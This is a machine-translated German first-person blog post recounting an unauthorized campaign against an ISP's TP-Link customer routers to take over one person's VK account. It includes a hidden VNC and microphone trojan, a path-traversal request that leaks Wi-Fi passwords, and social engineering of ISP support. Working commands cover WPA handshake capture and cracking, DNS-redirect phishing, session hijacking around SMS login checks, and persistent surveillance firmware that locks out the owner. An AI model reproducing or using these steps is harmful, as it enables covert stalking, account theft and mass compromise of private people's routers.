TP-LINK, , - . , . , .
Ich brauchte einmal, um auf die VK-Seite einer Person zuzugreifen, während ich für den Benutzer so unsichtbar wie möglich war, und begann, nach Wegen zu suchen. Das erste, was mir in den Sinn kam, war, den Trojaner dem Opfer zu überlassen, da ich bereits einen versteckten TightVNC mit Backconnect für meinen IP + versteckten VLC-Player vorbereitet hatte, der den Ton vom Mikrofon in Echtzeit auch auf meine IP überträgt. Es wurde jedoch überhaupt nicht als Malware in VirusTotal definiert. Aber in dem Artikel geht es überhaupt nicht darum. Infolgedessen gelang es mir, den Trojaner zu erhalten und Zugriff auf die VK zu erhalten (nur durch Kopieren von Cookies aus dem Browser des Opfers), aber bald wurde das Betriebssystem auf dem Computer des Benutzers neu installiert, und ich musste nach einem anderen Weg suchen.Ich wusste nur, welchen Anbieter das Opfer hatte. Nun, ich habe zunächst die gesamte Reichweite dieses berüchtigten Anbieters der Stadt N gescannt (aus offensichtlichen Gründen werde ich den Anbieter nicht anrufen) und fand eine wunderbare Sache: Port 8080 ist auf den meisten Hosts geöffnet. Es wurde sofort klar, dass dies eine Weboberfläche ist Router. Ich hatte bereits auf einen Standardadministrator gehofft (dann wäre es für den Anbieter ein völliger Zusammenbruch gewesen), aber nein, ich konnte das Passwort nicht finden, obwohl ich immer noch ungefähr ein Dutzend Router gefunden habe, auf denen das Standardkennwort war. Es stellte sich heraus, dass 90% aller Router TP-Link TL-WR741ND und seltener 740N, 841N, 941ND sind.
Hier ist alles sehr klar: Der Anbieter vermietet dieselben Router an Benutzer, konfiguriert sie während der Installation und es ist einfach zu faul für Benutzer, diese Einstellungen zu ändern. Es wurde immer interessanter. Sicherlich sollte in diesem Fall ein Muster in der Einstellung vorhanden sein, dh die Passwörter sind wahrscheinlich gleich. Ich habe mich für Google entschieden, wenn diese Modelle Schwachstellen aufweisen, und zu meiner damaligen Überraschung habe ich viele gefunden. Das erste, was mir aufgefallen ist, war der Artikel „Backdoor in TP-LINK-Routern“ .Ich habe mich sofort entschlossen, diese Sicherheitsanfälligkeit zu überprüfen. Dateien wurden auf den Router hochgeladen, aber er akzeptierte sie nicht, und dann begann ich darüber nachzudenken, worum es bei diesem nart.out geht. Dies ist eine MIPS-Binärdatei, die im Wesentlichen jede Anwendung sein kann. Sie müssen sie nur erstellen. Zunächst suchte ich nach einer fertigen Version, da ich mich vorher fast nie mit Cross-Compilation befassen musste. Zu meiner Überraschung war gerade in diesem Moment eine andere Person an dieser Ausgabe interessiert: Specx2 (ich empfehle übrigens, seinen Artikel zu lesendarüber, wie man eine Hack-Station aus einem Router zusammenbaut, was ich letztendlich nur aus der Ferne getan habe). Es gelang ihm übrigens, Netcat, das unter MIPS kompiliert wurde, in einem der chinesischen Foren genau in dem Abschnitt zu finden, in dem diese Sicherheitsanfälligkeit besprochen wurde. Diese Binärdatei wurde erfolgreich unter QEMU gestartet und über die gefundene Hintertür erfolgreich in den Router übertragen. Aus irgendeinem Grund war es jedoch nicht möglich, eine Verbindung zum Router herzustellen: Es gab nur keine Verbindung. Genosse Specx2 schlug vor, dass der Punkt sein könnte, dass Port 2222 einfach geschlossen werden könnte und Sie Netcat irgendwie auf einem anderen Port laufen lassen müssen.Wir haben versucht, netcat für MIPS selbst zu kompilieren, konnten jedoch die Standardportoption nicht festlegen. Als nächstes haben wir einen Disassembler verwendet, aber genauso erfolglos. Und dann habe ich beschlossen, diese Binärdatei mit dem üblichen Notepad ++ zu öffnen, und zu meiner Überraschung habe ich dort den begehrten 2222 gefunden. Diese Nummer kann leicht in eine andere geändert werden. Hauptsache, die Anzahl der Zeichen in der Datei ändert sich nicht. Der Port hat sich wirklich geändert, alles wurde auf QEMU getestet, aber wir konnten es immer noch nicht auf dem Router zum Laufen bringen.Ich gab meine Versuche, die Kontrolle über den Router zu erlangen, nicht auf und suchte nach anderen Schwachstellen. Bald stieß ich auf diesen Beitrag . Und tatsächlich: Bei den Modellen 841 und 941 gab es eine Muschel bei/userRpmNatDebugRpm26525557/linux_cmdline.html
Nur hier musste das Passwort vom Router noch bekannt sein, und die Benutzer dieses Anbieters hatten im Grunde 741 Modelle. Ich habe es geschafft, einen Router mit einem Standardkennwort und dieser Shell zu finden, wenn auch sehr abgeschnitten. So habe ich Zugriff auf das Dateisystem des Routers erhalten. Leider konnte ich nichts Wertvolles finden und die Shell funktionierte nicht richtig. Debuggen Entwickler wirklich?Es schien eine Sackgasse zu sein, lange Zeit hatte ich keine einzige Ahnung, aber irgendetwas sagte mir, dass es immer noch Schwachstellen gab. Und dann habe ich herausgefunden, dass der Router keine GET-Anfragen filtert. Das heißt, wenn das Passwort falsch eingegeben wird, wird standardmäßig die Seite / help geöffnet. Wenn wir jedoch beispielsweise folgende Anfrage stellen:GET IP:port/help/../../
Dann gelangen wir zum Stammverzeichnis des Dateisystems des Routers. Somit können wir fast jede Datei vom FS-Router herunterladen, ohne das Passwort zu kennen. Dies stellte sich als die erste erfolgreich funktionierende Sicherheitslücke von allem heraus, was ich gefunden habe. Aber was gibt es uns, wenn wir nur Dateien herunterladen können und nicht wissen, wo das Passwort gespeichert ist?Nach einer kurzen Suche konnte ich unter /tmp/ath0.ap_bss immer noch eine interessante Datei finden, in der das Passwort für Wi-Fi in übersichtlicher Form gespeichert ist. Ich habe mich sofort entschlossen, es auf einem der Router der Benutzer dieses Anbieters zu überprüfen.GET IP:8080/help/../../tmp/ath0.ap_bss
Wie sich herausstellte, arbeiten die Leute dort ziemlich faul und geben die gleichen Passwörter in die Weboberfläche des Routers und des Wi-Fi ein. Wenn wir also das Wi-Fi-Passwort anhand dieser Sicherheitsanfälligkeit lernen, erkennen wir das Passwort automatisch über die Webschnittstelle. Dies sind normalerweise 8 Ziffern. Seltener Zahlen mit Buchstaben. Nochmals, 8. Von nun an konnte ich auf den Router fast aller Benutzer zugreifen, die das vom Anbieter festgelegte Passwort nicht geändert haben, und praktisch niemand hat es geändert. Einige Router hatten zwar noch die neueste Firmware-Version, und diese Sicherheitsanfälligkeit funktionierte nicht, aber es gab nicht so viele. Sofort fand ich einen anderen interessanten Punkt heraus. Die SSID aller Punkte enthielt die zweite Hälfte der internen IP-Adresse des Benutzers, und die erste war für alle gleich. Es stellte sich heraus, dass das Passwort das gleiche war wie im persönlichen Konto auf der Website.Und diese zweite Hälfte des internen IP war die Vertragsnummer. Das heißt, anhand der Nummer der Benutzervereinbarung konnte die interne IP berechnet werden.Trotz der Tatsache, dass alle Benutzer eine echte externe IP hatten (wenn auch dynamisch), entschied ich mich, einen VPN-Server auf mehreren ASUS-Routern einzurichten, auf denen es ein Standardkennwort gab. Glücklicherweise wurde diese Funktion in die Standard-Firmware eingenäht. So habe ich Zugriff auf das interne Netzwerk des Anbieters erhalten.Aber vor dem Hacken war der VK noch weit weg. Ich kannte das IP-Opfer nicht einmal. Weder extern noch intern. Es gibt viele Möglichkeiten, die externe IP herauszufinden, und ich habe es getan. Nun, fangen wir an zu lernen. Erstens beantwortete er Ping-Anfragen, was bereits gut ist. Zweitens wusste ich, dass das Opfer auch einen Router mit demselben Modell hatte (dies kann auch von TTL verstanden werden, da die überwiegende Mehrheit der Benutzer Windows installiert hat und die Standard-TTL von Windows 128 ist). Zu meinem großen Bedauern waren jedoch alle Häfen des Opfers geschlossen, und es gab keinen Zugang zum Webmord von außen. Ich wusste jedoch, dass dies auf jeden Fall über LAN erfolgt. Dazu müssen wir jedoch über eine drahtlose Schnittstelle eine Verbindung zu diesem Router herstellen und das Kennwort für das Admin-Panel abrufen, was sehr problematisch wäre, da ich es zu diesem Zeitpunkt nicht finden konnte wo es gespeichert ist. Obwohl ich es jetzt schon weißin was ist es gespeichert/ dev / mtdblock3 , aber dieser Block ist nicht gemountet, so dass es unmöglich ist, ihn durch die beschriebene Sicherheitsanfälligkeit zu lesen.Ich habe auch erfahren, dass die Anmeldung über die VPN-Verbindung zum Zugriff auf das Internet die Initialen und den Nachnamen des Benutzers oder eines Teils davon sind und das Kennwort dasselbe ist. Ich begann zu überlegen, wie ich den Benutzer finden kann, den ich brauche. Vielleicht habe ich damals immer noch den Fehler gemacht, die IP zu definieren, und sie hat sich bereits geändert, als ich versucht habe, eine Verbindung zum Webmord herzustellen? Das erste, was mir in den Sinn kam, war eine einfache Aufzählung aller Router. Die Anzahl der Abonnenten beim Anbieter ist jedoch recht groß. Nachdem ich den gesamten Bereich gescannt hatte, fand ich ungefähr 3.000 Router mit Fernzugriff auf die Weboberfläche. Und es war notwendig, unter ihnen irgendwie den richtigen zu finden, wenn überhaupt.Zuerst habe ich versucht, ein Skript zu schreiben, das das Kennwort anhand der gefundenen Sicherheitsanfälligkeit erkennt. Anschließend habe ich die Netzwerk-Setup-Seite heruntergeladen und gespeichert. Aber ich bin darin schwach und nachdem ich diese Idee nach einer Weile verworfen hatte, entschied ich mich für einen normalen Clicker. Mit halbem Kummer verarbeitete ich (oder besser gesagt der Clicker) den gesamten Bereich. Als nächstes durchsuchte ich die Einstellungsdateien (in der Hoffnung, das Opfer anhand des Nachnamens im Login über die VPN-Verbindung zu finden), fand aber nichts, was ich brauchte.Ich begann weiter zu graben und stellte fest, dass jeder gehackte Router die ihn umgebenden Zugangspunkte über eine webbasierte Oberfläche scannen kann. Daher hatte ich eine verrückte Idee: den Nachbarn des Opfers mit dieser Sicherheitsanfälligkeit zu knacken, damit ich mit seinem Router versuchen kann, das Wi-Fi-Passwort des Opfers zu knacken und über das LAN in das Webinterface einzutreten, solange ich ein paar tausend Kilometer ohne Vertrauen zurücklege Erfolg war unvernünftig und es gab einfach keine Möglichkeit. Aber das umzusetzen, was damals gedacht war, schien undenkbar. Wie finde ich einen Nachbarn?Denken Sie daran, dass der zweite Teil der internen IP in der SSID enthalten ist. Es stimmt mit der Vertragsnummer überein. Es wäre schön, die SSID des Zugangspunkts des Benutzers zu kennen, damit Sie sie finden können. Was ich getan habe? Ja, ich habe es einfach genommen und an den technischen Support des Anbieters geschrieben und mich als Benutzer vorgestellt. Angeblich möchte ich für das Internet bezahlen, aber ich habe die Vertragsnummer vergessen. Und ich erhielt sofort eine Antwort, da ich den Namen und die Adresse kannte. Daher habe ich die interne IP des Opfers erkannt, die übrigens statisch ist (daher ist es nicht sinnvoll, die dynamische externe IP ständig zu berechnen, da auf einem der gehackten Router über VPN auf das interne Netzwerk zugegriffen werden kann). Ich habe auch die geschätzte SSID dieses Benutzers erhalten, sodass ich bereits etwas zum Arbeiten hatte.Die Aufgabe bestand darin, in alle Router hintereinander zu gehen und einen von ihnen, um einen Router mit der begehrten SSID im Distrikt zu finden. Die Aufgabe war wieder nicht einfach, aber denken Sie daran, dass wir Zugriff auf Ihr persönliches Konto haben, in dem die Adresse des Wohnsitzes des Benutzers angegeben ist. Nachdem ich mehrere Experimente durchgeführt hatte, stellte ich fest, dass zwischen der internen IP und der Benutzeradresse ein bestimmtes Muster besteht. Das heißt, es ist nicht erforderlich, dass sich die Nachbarn im selben Subnetz befinden, sondern zumindest in den benachbarten, zum Beispiel: 10.168.155.0 und 10.168.158.0. Als ich den Benutzer fand, der in der Nähe des Opfers lebte, begann ich, alle Router in den benachbarten Subnetzen zu sortieren. Infolgedessen habe ich die begehrte SSID nicht gefunden, aber ich habe 2 Nachbarn gefunden, nachdem ich ihre Adresse in meinem Konto gesehen habe. Mein Kopf explodierte: Wie könnte es sein, ich habe Nachbarn gefunden, aber ich habe nicht den richtigen Zugangspunkt in der Nähe. Dennoch war sie, nur mit einer geänderten SSID,und ich vermutete welche. Es stellte sich als einfach heraus.Fein! Der Router wurde wie seine Nachbarn gefunden, nachdem er jedoch viel Zeit damit verbracht hatte. Was als nächstes? Wir müssen das Passwort irgendwie vom drahtlosen Netzwerk erhalten, aber dafür müssen wir entweder den Handshake abrufen und das Passwort von ihm abrufen (der Schutz ist WPA2-PSK) oder die WPS-PIN abrufen, da WPS standardmäßig aktiviert ist, aber auf den meisten Routern nach 10 ungültigen Versuchen blockiert. Wie setzen wir zumindest einen Teil davon um? In der Tat gibt es auf den Routern der Nachbarn keine spezielle Software. Und dann kam der Gedanke, ihre OpenWRT-Router neu zu starten, da diese Firmware vor allem echtem Linux am nächsten kommt und es auch Aircrack-ng, Reaver und viele andere Pakete dafür gibt. Genosse Specx2sogar Bully versammelte sich darunter. Es gab nur ein Problem: Wie kann man den Router aus der Ferne neu flashen und nicht den Zugriff darauf verlieren? Schließlich werden nach dem Blinken alle Einstellungen auf die Standardeinstellungen zurückgesetzt.Ich war lange Zeit mit diesem Problem gequält. Ich dachte, es sei notwendig, die gesamte Firmware von Grund auf von der Quelle zu sammeln und die Einstellungen dort irgendwie vorab zu steuern, aber alles stellte sich als viel einfacher heraus. Ich wusste nicht einmal über die Existenz von OpenWRT Image Builder. Ich habe es ziemlich schnell herausgefunden, aber ich musste den richtigen Satz von Paketen auswählen, da das Volumen der Firmware 4 MB nicht überschreiten kann, und dies ist klein, da viele eine große Liste von Abhängigkeiten mit sich ziehen. Das nächste Problem war, dass der Benutzer erst nach dem Herstellen einer VPN-Verbindung mit dem Server des Anbieters Zugriff auf das Internet erhielt. Dann ging der gesamte Datenverkehr in den Tunnel und ich verlor den Kontakt zum Router. Möge mein Nachbar mir vergeben, ich habe ihn ohne Internet gelassen. Nachdem ich seinen Router erfolgreich geflasht hatte (nachdem ich im Verlauf erfolgloser Experimente ein paar Dutzend Benutzer ohne Internet gelassen hatte), übertrug ich die Netzwerkkarte des Routers sofort in den Überwachungsmodusifconfig wlan0 down
iw reg set BO
iwconfig wlan0 txpower 27
airmon-ng start wlan0
Und startete Airodump-ng .airodump-ng mon0 –c _ –bssid MAC__ –w /tmp/123
Einen Handschlag abzufangen war nicht schwierig. Ich habe den Dump sofort mit SCP vom Router heruntergeladenscp –P port user@host:/tmp/123-01.cap ~/123.cap
Gefiltert von unnötigen Paketen in Wireshark:wlan.fc.type_subtype == 0x08 || wlan.fc.type_subtype == 0x04 || eapol
Und konvertiert für Hashcat zu .hccap Format. Ich habe im Voraus ein kleines Wörterbuch vorbereitet, das mir geholfen hat, viele drahtlose Netzwerke zu knacken, und ich habe auch alle möglichen Passwörter hinzugefügt, die von diesem Benutzer verwendet werden könnten.oclHashcat64.exe –m2500 –a0 123.hccap wordlist.txt
Zum Glück wurde nach ein paar Sekunden das Passwort gefunden! Trotzdem musste man sich im Client-Modus irgendwie mit dem Router verbinden! Erst dann ändert sich das WAN für den Router des Nachbarn wieder und ich verliere den Zugriff darauf. Ich konnte immer noch nicht herausfinden, wie ich dieses Problem lösen sollte, also musste ich eine Person bitten, ein Opfer zu bringen, mich vom Telefon aus anzumelden und den Fernzugriff zu öffnen (jetzt kann ich davon ausgehen, dass Sie der Firmware nur im Voraus statische Routen hinzufügen mussten). Glücklicherweise stellte sich heraus, dass das Kennwort von der Weboberfläche der Standardadministrator admin war.Alles gut gelaufen! Ich habe bereits einen weiteren Aktionsplan vorbereitet. Auf meiner realen IP ohne Filterung habe ich den DNS-Server angehoben, wo ich den Eintrag für vk.com geändert habe, und ihn in meine IP geändert, wo auch der HTTP-Server mit PHP angehoben wurde. Dort wurde dementsprechend eine Fälschung mit der vk.com-Autorisierungsseite ausgefüllt, und im Router wurde der DNS-Server in meinen geändert. Ein Benutzer, der sich bei vk.com anmeldete, bekam meine Fälschung und somit war das Passwort mein, das Ziel wurde erreicht!Lange Zeit habe ich diese Methode verwendet, um ein Passwort zu erhalten, aber als die gepriesene Anmeldebestätigung auf vk.com aktiviert war, ist es nach Ansicht der Ersteller selbst fast unmöglich, sich fortzubewegen. Unter dem Strich müssen Sie bei der Autorisierung von einem neuen Gerät / Browser aus, wenn Sie das richtige Passwort eingeben, auch den Code per SMS eingeben, der an die Nummer des Besitzers gesendet wird. Aber für diesen Fall habe ich lange eine Theorie vorbereitet, die noch nicht getestet wurde.Zunächst habe ich versucht zu verstehen, wie der Server feststellt, dass die Eingabe von einem neuen Gerät stammt. Alles stellte sich als recht einfach heraus: Dem Browser wird ein neues Cookie hinzugefügt (wenn mein Speicher mir dient, heißt es remixttpid), das nur über eine verschlüsselte Verbindung übertragen wird. Und damit bestimmt der Server bereits den Browser, von dem aus die Anmeldung erlaubt ist. Wenn ich mich nicht irre, muss auch der User-Agent übereinstimmen. Es reicht also aus, dieses Cookie abzufangen, um sich erfolgreich mit einem bekannten Kennwort anzumelden. Dies ist jedoch recht schwierig: Wir müssen den Datenverkehr des Benutzers über Mitmproxy weiterleiten, damit er sich auch in diesem Moment anmeldet. Darüber hinaus wird der Benutzer eine Browserwarnung über eine Nichtübereinstimmung des Zertifikats bemerken. Warum so pervers sein, dachte ichWenn Sie nur eine vorhandene Sitzung abfangen können? Schließlich wird eine Browserprüfung nur zum Zeitpunkt der Anmeldung durchgeführt, jedoch nicht für Anfragen aus einer vorhandenen Sitzung! Deshalb müssen wir nur abfangenremixsid , das zusätzlich über eine unsichere Verbindung übertragen wird, da der Benutzer https nicht verwendet.Das Problem war nur das RemixsidEs stimmt mit der IP des Benutzers überein. Wenn es sich ändert, werden auch Cookies für login.vk.com verwendet, die nur über eine verschlüsselte Verbindung übertragen werden. Es ist schwieriger, sie abzufangen. Aber ich hatte Glück. Zu diesem Zeitpunkt begann der Anbieter, den Zugriff auf das Internet bereitzustellen, ohne dass eine VPN-Verbindung hergestellt werden musste. Dies bedeutet, dass ich einfach meinen PPTP-Server erhöhen und in den Einstellungen des Routers des Benutzers eine Verbindung dazu herstellen konnte. Also ging der gesamte Datenverkehr durch mich und der Benutzer erstellte, ohne es zu wissen, eine Sitzung, die an meine IP angehängt war und die ohne Probleme abgefangen wurde. Als nächstes habe ich gerade die vorherigen Einstellungen zurückgegeben und die abgefangene Sitzung verwendet (der Vorteil von IP ist statisch). SMS-Schutz erfolgreich gebrochen!Alles wäre gut, aber ich hörte hier nicht auf. Tatsache ist, dass der Benutzer, wenn er plötzlich versteht, worum es geht, das Kennwort einfach über die Einstellungen des Routers und über WLAN ändern kann. Um dies zu verhindern, habe ich begonnen, OpenWRT unter einem Benutzerrouter zu erstellen. Es war notwendig, alles vorauszusehen. Zur bequemen Überwachung des Opferverkehrs habe ich den FTP-Server mithilfe von curlftpfs als Dateisystem bereitgestellt. Dort werden Dumps geschrieben. Dieser gesamte Prozess wird in diesem Artikel beschrieben . Ursprünglich hatte ich vor, die Cloud als Dateisystem bereitzustellen , für das ich davfs2 verwendet habe , das auch unter OpenWRT nicht einfach zu erstellen warDas Problem war jedoch, dass die Datei zuerst in den Cache geschrieben und erst dann in die Cloud gegossen wurde. Folglich wurde die Dateigröße durch die Größe des Caches begrenzt, der extrem klein ist. Also habe ich mich für curlftpfs entschieden. Der Datenverkehr wurde mit tcpdump aufgezeichnet und in 512 MB-Dateien aufgeteilt.tcpdump -i br-lan -w /root/ftp/dump/`date +"%d_%m_%Y_%T_"` -C 512Mb &
Wobei / root / ftp / dump unser FTP-Dateisystem ist. All dieses Geschäft kann in Autostart (/etc/rc.local) gestellt werden.Im Allgemeinen sah der endgültige Satz von Paketen für die Firmware von OpenWRT Attitude Adjustment 12.09 folgendermaßen aus:make image PROFILE=TLWR740 PACKAGES="curlftpfs tcpdump tinyproxy wireless-tools -ppp -ppp-mod-pppoe" FILES=files/
Curlftpfs beansprucht den größten Teil des Speichers, gibt uns jedoch eine unbegrenzte Menge davon pro FTP. Mit Tcpdump können Sie den Datenverkehr des Opfers rund um die Uhr aufzeichnen, und mit tinyproxy können Sie über die IP- Adresse des Opfers auf das Internet zugreifen. Wenn Sie beispielsweise remixsid abfangen , können Sie sich auch mit tinyproxy bei der VK des Benutzers von seiner IP-Adresse aus anmelden oder seinen Datenverkehr einfach auf seine umleiten Proxy auf diese Weise:iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to ip:port
Im Allgemeinen können wir den Verkehr vollständig steuern. Sie können Pakete auch auf einem gemounteten FTP-Dateisystem installieren. Dazu verwenden wir opkg –dest , nachdem Sie den Namen und die Adresse für unser Dateisystem in /etc/opkg.conf angegeben haben . Der Rest der Konfiguration muss ebenfalls in den entsprechenden Dateien vorregistriert sein./etc/firewall.user
/etc/config/firewall
/etc/config/network
/etc/config/system
/etc/config/wireless
/etc/rc.local
.
Alle diese Dateien müssen im Voraus vorbereitet werden, um sie in die Firmware einzubetten. Was bringt uns das zusätzlich zu den zusätzlichen Funktionen? Tatsache ist jedoch, dass das Squashfs-Dateisystem schreibgeschützt ist. Dementsprechend kann der Benutzer die von mir festgelegten Standardeinstellungen in keiner Weise ändern. Bei allem Willen wird er auch über Telnet keine Verbindung herstellen können, da in rc.local , das in die Firmware eingenäht ist, eine Leitung vorhanden istecho –e “pass\npass” | passwd root
Das heißt, der Zugriff über Telnet wird sofort nach dem Laden des Routers unterbrochen, und nur ich habe das SSH-Kennwort. Das Zurücksetzen auf die Standardeinstellung mit einer physischen Schaltfläche schlägt auch hier fehl, da die Standardeinstellung von mir festgelegt und in die Firmware eingenäht wurde. Das Ziel ist erreicht.Im Zusammenhang mit der Übertragung aller Benutzer auf IPoE in jüngster Zeit und der Aufgabe von VPN standen alle hinter NAT, einschließlich Routern, auf denen ich ein VPN für den Zugriff auf das interne Netzwerk des Anbieters hatte. Zusätzlich zu denen, die den Dienst „Static IP“ aktiviert haben, natürlich. Es gibt jedoch ein Problem: Wer eine echte IP möchte, sollte weiterhin ein VPN verwenden, um auf das Internet zuzugreifen. Ich musste mich selbst quälen und OpenWRT mit einem verkabelten und konfigurierten PPTP-Client (und es funktioniert aus irgendeinem Grund wirklich schief) sowie einem verkabelten und konfigurierten OpenVPN-Server erstellen. Viele Router starben während der Experimente, aber das Ergebnis wurde letztendlich erreicht. Nachdem ich diese Firmware in mehrere Router (von den wenigen mit echter IP) integriert habe, habe ich über OpenVPN einen stabilen Zugriff auf das interne Netzwerk.Das Problem beim Verbinden von PPTP VPN bestand darin, dass die Server des Anbieters keine Verschlüsselung unterstützen. Dies wurde durch Hinzufügen einer Zeile zu /etc/ppp/options.pptp behoben .nomppe
Ansonsten unterschied sich der Prozess zum Einrichten des PPTP-VPN-Clients und des OpenVPN-Servers nicht von den OpenWRT-Handbüchern.Ich hoffe, dieser Artikel wird für jemanden interessant sein und jemand wird etwas Neues daraus lernen.UPD: Wie ValdikSS in den Kommentaren schrieb , können Sie anstelle von curlftpfs + tinyproxy OpenSSH verwenden, das funktionaler ist.